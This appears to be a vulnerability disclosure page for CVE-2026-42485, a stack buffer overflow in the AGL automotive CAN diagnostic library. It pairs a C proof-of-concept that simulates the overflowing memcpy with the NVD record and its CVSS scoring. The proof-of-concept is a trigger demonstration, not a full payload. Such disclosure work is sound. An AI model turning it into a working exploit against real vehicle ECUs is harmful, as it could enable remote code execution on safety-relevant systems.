CVE-2026-42485

/* * PoC for CVE-2026-42485 * This code demonstrates the stack buffer overflow logic. * Vulnerability: unchecked payload_length in memcpy. */ #include <stdio.h> #include <string.h> #include <stdint.h> // Constants from the vulnerable source #define MAX_DIAGNOSTIC_PAYLOAD_SIZE 6 #define MAX_UDS_REQUEST_PAYLOAD_LENGTH 7 // Simulated vulnerable function void vulnerable_send_diagnostic_request(uint8_t *data, uint8_t pid_length, uint8_t payload_length) { // Stack buffer allocation uint8_t stack_buf[MAX_DIAGNOSTIC_PAYLOAD_SIZE]; // Calculate offset: 1 + pid_length (2-3 bytes) size_t offset = 1 + pid_length; printf("[+] Buffer Address: %p\n", stack_buf); printf("[+] Writing to Offset: %zu\n", offset); printf("[+] Payload Length: %d\n", payload_length); // VULNERABILITY: No bounds check on payload_length against buffer size - offset // If offset is 3 and payload_length is 7, we write 7 bytes to buffer+3. // Total write touches indices 3 to 9. Buffer size is 6 (indices 0 to 5). // This results in a 4-byte overflow. memcpy(stack_buf + offset, data, payload_length); } int main() { printf("=== CVE-2026-42485 PoC Trigger ===\n"); // Malicious input data uint8_t exploit_data[MAX_UDS_REQUEST_PAYLOAD_LENGTH]; memset(exploit_data, 0x41, sizeof(exploit_data)); // 'A' // Trigger conditions: pid_length=2 (offset=3), payload_length=7 // This causes the overflow described in the CVE. vulnerable_send_diagnostic_request(exploit_data, 2, 7); printf("[+] Exploit payload sent. Stack corruption occurred.\n"); return 0; }

{"cve": {"id": "CVE-2026-42485", "sourceIdentifier": "[email protected]", "published": "2026-05-01T17:16:25.377", "lastModified": "2026-05-05T20:24:04.853", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AGL agl-service-can-low-level contains a stack buffer overflow in the uds-c library. The send_diagnostic_request function in uds.c allocates a 6-byte stack buffer (MAX_DIAGNOSTIC_PAYLOAD_SIZE=6) but copies up to 7 bytes (MAX_UDS_REQUEST_PAYLOAD_LENGTH=7) via memcpy at an offset of 1+pid_length (2-3 bytes), resulting in 1-4 bytes of controlled stack overflow. The payload_length field (uint8_t) has no bounds check against the destination buffer. On 32-bit ARM automotive ECUs without stack canaries, this can lead to return address overwrite and RCE."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://gerrit.automotivelinux.org/gerrit/apps/agl-service-can-low-level", "source": "[email protected]"}, {"url": "https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643", "source": "[email protected]"}]}}